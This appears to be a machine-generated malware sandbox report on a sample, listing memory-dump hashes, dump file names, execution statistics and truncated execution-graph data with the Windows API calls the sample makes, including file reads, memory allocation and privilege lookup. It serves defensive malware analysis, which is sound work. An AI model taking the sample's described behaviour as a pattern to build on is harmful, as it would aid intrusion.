                                                          • Opcode Fuzzy Hash: bb167fa513d1eb487d5bee33762e0dc2c997ef94a2010d081dc5671d8dd23370
                                                          • Instruction Fuzzy Hash: 3BD0C97130D3504FD34AC638DC231547BF19A8A11032D80AB9448CB393EA26ED039785
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 12a800be11c6dde94ab85bea46f57c2be36fd8cfaec274906b12f0ec5fdbe2fa
                                                          • Instruction ID: 2a259ec2f8cc785d053a54c9cb52e0b512416f11d5b1ca57bd28325507e36364
                                                          • Opcode Fuzzy Hash: 12a800be11c6dde94ab85bea46f57c2be36fd8cfaec274906b12f0ec5fdbe2fa
                                                          • Instruction Fuzzy Hash: 80D0A771C0420CEF8F01CFA1D80149DBBF9EB49101B1049F5D50AC7200FE314A005BD2
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 91d697ac937df4cbf954753651b84bd7f50e1eae619233866a198a07a5b5e451
                                                          • Instruction ID: 3df87354bc3f9510546e0d3678d681a63a1fbfacb0075c1d49b30fc70b86e78f
                                                          • Opcode Fuzzy Hash: 91d697ac937df4cbf954753651b84bd7f50e1eae619233866a198a07a5b5e451
                                                          • Instruction Fuzzy Hash: 90D0C9B1D0520CFF8F50DFF1890059EBBE9DB4A180B2045F6D90AD7210EA319F1467E2
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 140febf9350beee60371dc989be406f0aac169dbe00b80ecd5d250aa44afe02a
                                                          • Instruction ID: 672d40c074e5e708e83bba3b3262b2ba16d2f3f4429590f90c4d034474821cc1
                                                          • Opcode Fuzzy Hash: 140febf9350beee60371dc989be406f0aac169dbe00b80ecd5d250aa44afe02a
                                                          • Instruction Fuzzy Hash: CDD05EF46082805FEB82D614CC90815BFA1AB91254704C4DDE488CF266D7669D03C715
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 962e857514935a42d838609b9cdf9a7dd23115a2568bfd772688ab7bb3e60b82
                                                          • Instruction ID: addb64803038b2417e34a0e8feac0b963615c0b1ebc4465787db192c3be5d716
                                                          • Opcode Fuzzy Hash: 962e857514935a42d838609b9cdf9a7dd23115a2568bfd772688ab7bb3e60b82
                                                          • Instruction Fuzzy Hash: 8DD0C975208111AF9204CE44E941C6BB7EAEBC8A10B14884EB84053310CA62DC16CBB2
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c447925631b9eae7b2727efd79039bccfe3aa145f3bb3bee9ed2f9d61dda1806
                                                          • Instruction ID: 8ce6853d81c5efcd78efbed57376a6551c710481c5d89f4ae5f2fd1bd158fd87
                                                          • Opcode Fuzzy Hash: c447925631b9eae7b2727efd79039bccfe3aa145f3bb3bee9ed2f9d61dda1806
                                                          • Instruction Fuzzy Hash: 61C080B05095405EC7C3C325D4514407F51DE95204314D1DED448C7717CB2748038751
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac9eecf8def0e25752e66f98174dcf856230493cf55e1090a6a42906f5b07fd5
                                                          • Instruction ID: 2ab52a8706730760f10e47dabae9dcd5574e4611a9eca747f498e19d9e2c8651
                                                          • Opcode Fuzzy Hash: ac9eecf8def0e25752e66f98174dcf856230493cf55e1090a6a42906f5b07fd5
                                                          • Instruction Fuzzy Hash: 0FC08CE640AB8094AEE362208C80516BF506F22310350C093D2881412293168610922F
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 142ead24b288e9743578897ff7454ed3415a89420e85f06cff48ff1ab075bdf3
                                                          • Instruction ID: a31f8a4e2d7c983e0ba9289523876dcfb99a5dbb0e453947a5bedba22f56edeb
                                                          • Opcode Fuzzy Hash: 142ead24b288e9743578897ff7454ed3415a89420e85f06cff48ff1ab075bdf3
                                                          • Instruction Fuzzy Hash: 17C04C71040648D7E7146799B44E36877A8A705316F540025A54D854718BBD69E4C65A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 04ae9cef57e881139de820eefc8afc4d46c5aaa865a7939946c75dfed97baa61
                                                          • Instruction ID: 698dfbf7ba5849eb0ae4661240ab9fe7d1a6449340bb8819c9d44fdfaadc040e
                                                          • Opcode Fuzzy Hash: 04ae9cef57e881139de820eefc8afc4d46c5aaa865a7939946c75dfed97baa61
                                                          • Instruction Fuzzy Hash: 13C08C3A010100AB8A81A740C54881ABBA0BF51300B00C822A10105020CB208528AB03
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a403ecc4727d9601111b0649a38dec8a64ae8a397223b5a9fb2cb5b06a59daf
                                                          • Instruction ID: 4129cb70ba6f02199f3494dc2108c17a2581001f00d4ce476b878b0477c5b5a0
                                                          • Opcode Fuzzy Hash: 1a403ecc4727d9601111b0649a38dec8a64ae8a397223b5a9fb2cb5b06a59daf
                                                          • Instruction Fuzzy Hash: 63C002B091C258CFDFA18F72D4584AC7B75BB8F242F20646E917797262C6312904CF11
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 761fbdf672946135de0330aa1d5b6c7179b99768fcea53478c189d6bf90d85e1
                                                          • Instruction ID: 76325dd8b1c9a007edbfd9d4d2865449837262efcc45f2c804dc0dda69c24e07
                                                          • Opcode Fuzzy Hash: 761fbdf672946135de0330aa1d5b6c7179b99768fcea53478c189d6bf90d85e1
                                                          • Instruction Fuzzy Hash: 52B092B61A4640A268A062A08888B2A5A00ABA2700B808C22220910010C621842AA22B
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2c2636a16617edabde6238199beaf0e80e6325288f0f6b7ac3262dbbacbe9c62
                                                          • Instruction ID: e7f20d3a93a537af639d957f8f8e8631d7461f5ee3543763315be8ab1ccf706c
                                                          • Opcode Fuzzy Hash: 2c2636a16617edabde6238199beaf0e80e6325288f0f6b7ac3262dbbacbe9c62
                                                          • Instruction Fuzzy Hash: ABB012B0A030005B8A42D644E941864B328EB84108334CC9CA8068B3ABEF33ED038AC0
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4cbede454f044fd277a3e1e24a8ac25c1885af48c552171b173d3b65e1aff831
                                                          • Instruction ID: 797b96c1afd2676b23a95a1a8e602d8b2f07da0b4f9723b33ef2586624004f4d
                                                          • Opcode Fuzzy Hash: 4cbede454f044fd277a3e1e24a8ac25c1885af48c552171b173d3b65e1aff831
                                                          • Instruction Fuzzy Hash: 56C04C70D18108CFCB608F72D4484AC7775BB4E242F20542D903793112C6302404CF00
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 553a3e1533a33970b463ace2064912813403635a2b71184cb570dab477052a2f
                                                          • Instruction ID: ca5bf82675ffd51f826a4239900273f3444c5563ec5a39683690f4fd795b3e15
                                                          • Opcode Fuzzy Hash: 553a3e1533a33970b463ace2064912813403635a2b71184cb570dab477052a2f
                                                          • Instruction Fuzzy Hash: 48B0923A001048AE8A82AB40C904C4ABBA5BB54A007408061A2440A0308621C529AB52
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                          • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                          • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                          • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 894be7c1b4576e221d403eed206ee8c8a9656b324c3e63300fe3a66750a4dc62
                                                          • Instruction ID: 99f83943c6df5a290c3ae1bde1b28e6867bfb915b02a511721b09cdd355deda0
                                                          • Opcode Fuzzy Hash: 894be7c1b4576e221d403eed206ee8c8a9656b324c3e63300fe3a66750a4dc62
                                                          • Instruction Fuzzy Hash: 2BE13AB4E002598FDB54DFA9C580AAEFBB2FF89304F24816AD514AB355D734AD41CF60
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72b584926b423e09ecdf1aebcbbc7bb8ed3220205b0caa544a3c55356315bbe0
                                                          • Instruction ID: 9a8aaa29a0d8603f94b7830e12a120325a8426e92049a9051ccca34c9aad7a69
                                                          • Opcode Fuzzy Hash: 72b584926b423e09ecdf1aebcbbc7bb8ed3220205b0caa544a3c55356315bbe0
                                                          • Instruction Fuzzy Hash: D8E1F7B4E002198FDB54DFA9C580AAEFBB6FF89304F248169D514AB356D734AD42CF60
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30adead752c9a2107b3a7bcc4f81fd601d32c7cf8fbd093f58dee48817ad1662
                                                          • Instruction ID: ad64f84c34bd3bcfb195865731a71febe7f30a6d9f339f2ba024c9e26b7560b4
                                                          • Opcode Fuzzy Hash: 30adead752c9a2107b3a7bcc4f81fd601d32c7cf8fbd093f58dee48817ad1662
                                                          • Instruction Fuzzy Hash: 11E127B4E002598FDB54DFA9C580AAEFBB6FF89304F248169D514AB356C731AD42CF60
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a4fffd1bf0b3cbf888f115918e35740f41b910b832d8d6b2ea589f9557e802ae
                                                          • Instruction ID: 832556dbe1dc3654ed92c7b52f6dcb06316f959a1a2d0787f7275e99c135f39b
                                                          • Opcode Fuzzy Hash: a4fffd1bf0b3cbf888f115918e35740f41b910b832d8d6b2ea589f9557e802ae
                                                          • Instruction Fuzzy Hash: 50E117B4E002198FDB54DFA9D580AAEFBB6FF89304F248169D614AB355D730AD42CF60
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62219a8733a59431e58df0cad4d5f8984394412d3884a4b266781a72697da74a
                                                          • Instruction ID: b5fb2b6de7ea4c18f4543c020ad4b6bfd16b427c41c49ca75e569a986d00a349
                                                          • Opcode Fuzzy Hash: 62219a8733a59431e58df0cad4d5f8984394412d3884a4b266781a72697da74a
                                                          • Instruction Fuzzy Hash: 9AE138B4E002599FDB54DFA9C580AAEFBB2FF89304F248169D904AB355D730AD41CFA0
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb1eedf0c70507ad3e23886167ec27bae9697f24a4a3eca62bc1cceee67911cd
                                                          • Instruction ID: 90fcd652bdf2b18a8ada36a801c4f2a6a548890201fec24feab0bd6d371f60d5
                                                          • Opcode Fuzzy Hash: eb1eedf0c70507ad3e23886167ec27bae9697f24a4a3eca62bc1cceee67911cd
                                                          • Instruction Fuzzy Hash: 4AD12634C2071ACACB20EB64D8506E9B7B1FF99300F50D79AD5497B260EB706AC9CF91
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a681e78ee4a7c66af5987e111140774756eb8c8a80e1c81de6cb0f13515012b
                                                          • Instruction ID: c940775797abc9fcf07097d15a5265425e26a2d03a3aadcc8d82546e86465ec4
                                                          • Opcode Fuzzy Hash: 5a681e78ee4a7c66af5987e111140774756eb8c8a80e1c81de6cb0f13515012b
                                                          • Instruction Fuzzy Hash: 52D12634C2071ACACB20EB64D8506E9B7B1FF99300F50D79AD5497B260EB706AC9CF91
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f5557a8db154cf87d18a1aba6b4c98708d06bc770b3c0688f4d0ef82bbf2563
                                                          • Instruction ID: 46d58db017f35f2607f932311829b6d8a399402749481820b8e70885d26d970f
                                                          • Opcode Fuzzy Hash: 0f5557a8db154cf87d18a1aba6b4c98708d06bc770b3c0688f4d0ef82bbf2563
                                                          • Instruction Fuzzy Hash: 9FA14F32E0021A8FCF15DFB8C84459EBBB2FF85300B15856EEA05EB265DB35EA55CB50
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 606435ae367ed5ea063e8e697781bca28e906e26a21655e36ec72757a98e8774
                                                          • Instruction ID: d8d06b579be0501322495f52d9ae3f63b802dfef1f8005d5a24b28da8f9f04c0
                                                          • Opcode Fuzzy Hash: 606435ae367ed5ea063e8e697781bca28e906e26a21655e36ec72757a98e8774
                                                          • Instruction Fuzzy Hash: 04518F74E012168FD798EF7BE8006AE7BE7FBC8300F04D529D1059F2A8EB3559069B52
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fba303177be43a1352fc0b74a1b6b0e4a7d48c418a87e16f5215396396e592a2
                                                          • Instruction ID: 9bafc1b1d688d38142241b6a3e24eb64aeb5e84301ad1c56432ad50b14ae6f3c
                                                          • Opcode Fuzzy Hash: fba303177be43a1352fc0b74a1b6b0e4a7d48c418a87e16f5215396396e592a2
                                                          • Instruction Fuzzy Hash: FD516D74E016168FE758EF7BE8006AE7BE7FBC8301F04D429D1059F2A8EB7558069B52
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bfab2a716cca59a82f137dbdbc111be962d9e9a25dd83abe6ee2234149f6f01
                                                          • Instruction ID: d9dba2848194d1b8ee6883a6354583201310c1534ff3f409eff0ef8cabe33a12
                                                          • Opcode Fuzzy Hash: 7bfab2a716cca59a82f137dbdbc111be962d9e9a25dd83abe6ee2234149f6f01
                                                          • Instruction Fuzzy Hash: CA512AB4E002598FDB54CFA9C5805AEFBB6FF89304F24816AD518AB356D7309E42CF61

                                                          Execution Graph

                                                          Execution Coverage: 1.3%
                                                          Dynamic/Decrypted Code Coverage: 2.7%
                                                          Signature Coverage: 5.9%
                                                          Total number of Nodes: 546
                                                          Total number of Limit Nodes: 67
                                                          execution_graph: flattened node/edge data of the report's interactive execution graph, left in the text export by the graph viewer. Each node is a viewer-internal id followed by a function address in the sample, optionally followed by the APIs that node calls or a collapsed summary such as "2 API calls"; each edge is written id->id. The extract is truncated. First node listed: 41f0c0.
                                                          API calls recoverable from the graph nodes: LdrLoadDll (41af50, 418bb0, 409620, 41a290, 41a2d0, 41a310, 41a450, 41aef0, 4152c0), ExitProcess (41a6bf), NtCreateFile (41a36c), NtReadFile (41a41c), NtClose (41a49c), RtlAllocateHeap (41a63c), RtlFreeHeap with LdrLoadDll (41cf80), LdrLoadDll with RtlAllocateHeap (41bfc0), LdrLoadDll with NtReadFile and NtClose (414780), LdrLoadDll with NtClose and LdrInitializeThunk (414640).
41bdb0 2 API calls 100007->100009 100010 41bdb0 2 API calls 100008->100010 100011 4153e7 100009->100011 100010->100005 100011->99872 100013 41ad74 100012->100013 100014 41ac20 LdrLoadDll 100012->100014 100116 41ac20 100013->100116 100014->100013 100017 41ac20 LdrLoadDll 100018 41ad86 100017->100018 100019 41ac20 LdrLoadDll 100018->100019 100020 41ad8f 100019->100020 100021 41ac20 LdrLoadDll 100020->100021 100022 41ad98 100021->100022 100023 41ac20 LdrLoadDll 100022->100023 100024 41ada1 100023->100024 100025 41ac20 LdrLoadDll 100024->100025 100026 41adad 100025->100026 100027 41ac20 LdrLoadDll 100026->100027 100028 41adb6 100027->100028 100029 41ac20 LdrLoadDll 100028->100029 100030 41adbf 100029->100030 100031 41ac20 LdrLoadDll 100030->100031 100032 41adc8 100031->100032 100033 41ac20 LdrLoadDll 100032->100033 100034 41add1 100033->100034 100035 41ac20 LdrLoadDll 100034->100035 100036 41adda 100035->100036 100037 41ac20 LdrLoadDll 100036->100037 100038 41ade6 100037->100038 100039 41ac20 LdrLoadDll 100038->100039 100040 41adef 100039->100040 100041 41ac20 LdrLoadDll 100040->100041 100042 41adf8 100041->100042 100043 41ac20 LdrLoadDll 100042->100043 100044 41ae01 100043->100044 100045 41ac20 LdrLoadDll 100044->100045 100046 41ae0a 100045->100046 100047 41ac20 LdrLoadDll 100046->100047 100048 41ae13 100047->100048 100049 41ac20 LdrLoadDll 100048->100049 100050 41ae1f 100049->100050 100051 41ac20 LdrLoadDll 100050->100051 100052 41ae28 100051->100052 100053 41ac20 LdrLoadDll 100052->100053 100054 41ae31 100053->100054 100055 41ac20 LdrLoadDll 100054->100055 100056 41ae3a 100055->100056 100057 41ac20 LdrLoadDll 100056->100057 100058 41ae43 100057->100058 100059 41ac20 LdrLoadDll 100058->100059 100060 41ae4c 100059->100060 100061 41ac20 LdrLoadDll 100060->100061 100062 41ae58 100061->100062 100063 41ac20 LdrLoadDll 100062->100063 100064 41ae61 100063->100064 100065 41ac20 LdrLoadDll 100064->100065 100066 41ae6a 100065->100066 100067 41ac20 LdrLoadDll 100066->100067 
100068 41ae73 100067->100068 100069 41ac20 LdrLoadDll 100068->100069 100070 41ae7c 100069->100070 100071 41ac20 LdrLoadDll 100070->100071 100072 41ae85 100071->100072 100073 41ac20 LdrLoadDll 100072->100073 100074 41ae91 100073->100074 100075 41ac20 LdrLoadDll 100074->100075 100076 41ae9a 100075->100076 100077 41ac20 LdrLoadDll 100076->100077 100078 41aea3 100077->100078 100079 41ac20 LdrLoadDll 100078->100079 100080 41aeac 100079->100080 100081 41ac20 LdrLoadDll 100080->100081 100082 41aeb5 100081->100082 100083 41ac20 LdrLoadDll 100082->100083 100084 41aebe 100083->100084 100085 41ac20 LdrLoadDll 100084->100085 100086 41aeca 100085->100086 100087 41ac20 LdrLoadDll 100086->100087 100088 41aed3 100087->100088 100089 41ac20 LdrLoadDll 100088->100089 100090 41aedc 100089->100090 100090->99876 100092 41af50 LdrLoadDll 100091->100092 100093 419ecc 100092->100093 100122 1062df0 LdrInitializeThunk 100093->100122 100094 419ee3 100094->99796 100096->99873 100098 41af50 LdrLoadDll 100097->100098 100099 41a54c NtAllocateVirtualMemory 100098->100099 100099->99975 100101 41cf30 100100->100101 100102 41cf36 100100->100102 100101->99982 100103 41bf80 2 API calls 100102->100103 100104 41cf5c 100103->100104 100104->99982 100106 41cfe5 100105->100106 100110 41d01d 100105->100110 100107 41bf80 2 API calls 100106->100107 100108 41cffa 100107->100108 100109 41bdb0 2 API calls 100108->100109 100109->100110 100110->99986 100111->99993 100112->99995 100113->99997 100114->100000 100115->99979 100117 41ac3b 100116->100117 100118 414e40 LdrLoadDll 100117->100118 100119 41ac5b 100118->100119 100120 414e40 LdrLoadDll 100119->100120 100121 41ad07 100119->100121 100120->100121 100121->100017 100122->100094 100124 1062c11 100123->100124 100125 1062c1f LdrInitializeThunk 100123->100125 100124->99882 100125->99882 100127 41af50 LdrLoadDll 100126->100127 100128 41a67c RtlFreeHeap 100127->100128 100128->99885 100130 407eb0 100129->100130 100131 407eab 100129->100131 100132 41bd30 2 API calls 
100130->100132 100131->99804 100138 407ed5 100132->100138 100133 407f38 100133->99804 100134 419eb0 2 API calls 100134->100138 100135 407f3e 100136 407f64 100135->100136 100139 41a5b0 2 API calls 100135->100139 100136->99804 100138->100133 100138->100134 100138->100135 100140 41bd30 2 API calls 100138->100140 100145 41a5b0 100138->100145 100141 407f55 100139->100141 100140->100138 100141->99804 100143 40817e 100142->100143 100144 41a5b0 2 API calls 100142->100144 100143->99764 100144->100143 100146 41af50 LdrLoadDll 100145->100146 100147 41a5cc 100146->100147 100150 1062c70 LdrInitializeThunk 100147->100150 100148 41a5e3 100148->100138 100150->100148 100152 41b5b3 100151->100152 100155 40ace0 100152->100155 100156 40ad04 100155->100156 100157 409c3a 100156->100157 100158 40ad40 LdrLoadDll 100156->100158 100157->99771 100158->100157 100160 40b053 100159->100160 100161 40b0d0 100160->100161 100174 419c80 LdrLoadDll 100160->100174 100161->99778 100164 41af50 LdrLoadDll 100163->100164 100165 40f1ab 100164->100165 100165->99786 100166 41a7c0 100165->100166 100167 41af50 LdrLoadDll 100166->100167 100168 41a7df LookupPrivilegeValueW 100167->100168 100168->99782 100170 41af50 LdrLoadDll 100169->100170 100171 41a26c 100170->100171 100175 1062ea0 LdrInitializeThunk 100171->100175 100172 41a28b 100172->99783 100174->100161 100175->100172 100177 40b1e0 100176->100177 100178 40b030 LdrLoadDll 100177->100178 100179 40b1f4 100178->100179 100179->99719 100181 40ae41 100180->100181 100182 40ae3d 100180->100182 100183 40ae8c 100181->100183 100184 40ae5a 100181->100184 100182->99722 100227 419cc0 LdrLoadDll 100183->100227 100226 419cc0 LdrLoadDll 100184->100226 100186 40ae9d 100186->99722 100188 40ae7c 100188->99722 100190 4143b6 100189->100190 100191 40f490 3 API calls 100189->100191 100190->99724 100191->100190 100228 4087a0 100192->100228 100195 4087a0 19 API calls 100196 408a8a 100195->100196 100198 408a9d 100196->100198 100246 40f700 10 API calls 100196->100246 100198->99726 
